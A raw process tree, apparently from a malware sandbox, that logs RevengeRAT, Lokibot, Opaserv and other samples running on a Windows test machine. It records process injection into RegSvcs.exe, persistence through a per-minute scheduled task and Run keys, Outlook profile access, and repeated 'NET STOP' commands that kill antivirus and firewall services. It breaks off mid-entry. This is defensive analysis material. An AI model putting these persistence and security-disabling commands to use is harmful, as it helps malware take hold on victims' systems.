C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1768 /prefetch:12⤵PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:82⤵PID:4504
-
-
C:\Users\Admin\Downloads\RevengeRAT.exe"C:\Users\Admin\Downloads\RevengeRAT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1332 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2004 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"4⤵PID:5100
-
-
-
-
C:\Users\Admin\Downloads\RevengeRAT.exe"C:\Users\Admin\Downloads\RevengeRAT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3020 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Drops startup file
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:5724 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"4⤵PID:5156
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ju_pq1af.cmdline"4⤵PID:3892
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5A1C34C0855546818EC9488A36407AF2.TMP"5⤵PID:4764
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rtuogbpb.cmdline"4⤵PID:6040
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc278CEDD9DA46481392B23CD4D7D9C276.TMP"5⤵PID:3364
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0mv9dt89.cmdline"4⤵PID:5780
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB34.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCAC75D3A1CD14BA8B1A6A49F67ADFBB.TMP"5⤵PID:4844
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6h2k6jzu.cmdline"4⤵PID:5784
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc720324A133FD4DC3B26B3F3347521D1D.TMP"5⤵PID:3984
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\acxzejxa.cmdline"4⤵PID:4568
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc60827A94E7754A898DE67F62171214BA.TMP"5⤵PID:5984
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\a_uidple.cmdline"4⤵PID:2760
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD09.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6CEF795FA7B41ED8EA3908D35F2C3EF.TMP"5⤵PID:5444
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6068 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"5⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:4928 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"6⤵PID:2656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:5692
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\r_5tbmmf.cmdline"6⤵PID:5660
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC63.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc40FADA3EA24E0A994A953F115285F7.TMP"7⤵PID:3960
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\reav2i_2.cmdline"6⤵PID:4684
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD8C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD34AD96315FD43BB814E6DC679C5C656.TMP"7⤵PID:2004
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lint-com.cmdline"6⤵PID:5792
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE48.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7ADF1030C9EF437D8C1A6371CB24FEF4.TMP"7⤵PID:388
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ipxswqdu.cmdline"6⤵
- System Location Discovery: System Language Discovery
PID:5900 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBEC5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1642CC88577D4C7EB35CE9B0C7FCACB1.TMP"7⤵PID:5988
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hyini4d8.cmdline"6⤵PID:4604
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF90.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE402767C76EF4A9790D015B33CA87B1.TMP"7⤵PID:4400
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dak1mkzd.cmdline"6⤵PID:3544
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC09A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB2F7BC43CF6542C29BCDC5162BACD81.TMP"7⤵PID:5660
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kwahlyc-.cmdline"6⤵PID:6068
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1C2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDCB3AF7431764750958A50D397EE9C8.TMP"7⤵PID:1840
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hjhtxtca.cmdline"6⤵PID:3160
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC25F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF705DB3ECD9C468C9644884DB4188048.TMP"7⤵PID:5456
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\5fkcqkwt.cmdline"6⤵PID:4388
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC31A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE83D288CE6AF4FC18FFEDC3345226186.TMP"7⤵PID:3196
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\j7kyx9md.cmdline"6⤵
- System Location Discovery: System Language Discovery
PID:3204 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC462.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB0CA72D6C36542D0B4A16D3B7213D2A.TMP"7⤵PID:3984
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:12⤵PID:5568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6748 /prefetch:82⤵PID:5652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,9083850617669660721,219362610263899544,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4000 /prefetch:82⤵PID:5804
-
-
C:\Users\Admin\Downloads\Sevgi.a.exe"C:\Users\Admin\Downloads\Sevgi.a.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
PID:4976
-
-
C:\Users\Admin\Downloads\Sevgi.a.exe"C:\Users\Admin\Downloads\Sevgi.a.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
PID:4772
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2164
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4320
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3852 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
PID:2052 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1596
-
-
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:2212
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:5492
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:1692
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5276
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\YOUR_FILES_ARE_ENCRYPTED.HTML1⤵PID:5920
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd37d446f8,0x7ffd37d44708,0x7ffd37d447182⤵PID:5936
-
-
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4936
-
-
C:\Users\Admin\Downloads\Opaserv.l.exe"C:\Users\Admin\Downloads\Opaserv.l.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3320 -
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC2⤵PID:3312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC3⤵PID:1932
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW2⤵PID:5736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW3⤵PID:6016
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC2⤵PID:5764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC3⤵PID:4476
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD2⤵PID:5740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD3⤵PID:3308
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS2⤵PID:2860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS3⤵PID:6076
-
-
-
C:\WINDOWS\system\msload.exeC:\WINDOWS\system\msload.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:6036 -
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
- System Location Discovery: System Language Discovery
PID:5568 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
PID:500
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:6092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5160
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5940
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:1640
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:876
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:4684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:1584
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:4372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:1600
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:1792
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5324
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:1448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5560
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
- System Location Discovery: System Language Discovery
PID:5092 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:4108
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
- System Location Discovery: System Language Discovery
PID:2256 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:3132
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5200
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
- System Location Discovery: System Language Discovery
PID:1908 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:368
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:1548
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5640
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5624
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:4612
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3880
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:384
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
- System Location Discovery: System Language Discovery
PID:4584 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:1292
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:6132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5992
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:1860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:1880
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:1768
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:3940
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:1056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5700
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:3340
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:1944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:2296
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:4696
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5968
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:2256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5960
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4012
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:2076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5540
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:2108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:4816
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:624
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:3624
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4892
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:776
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5912
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:1764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:2912
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5092
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5208
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5608
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:4484
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:3896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:832
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:1692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5632
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:3908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:4816
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5184
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:2224
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:776
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:4088
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:6016
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5520
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5848
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
- System Location Discovery: System Language Discovery
PID:3992 -
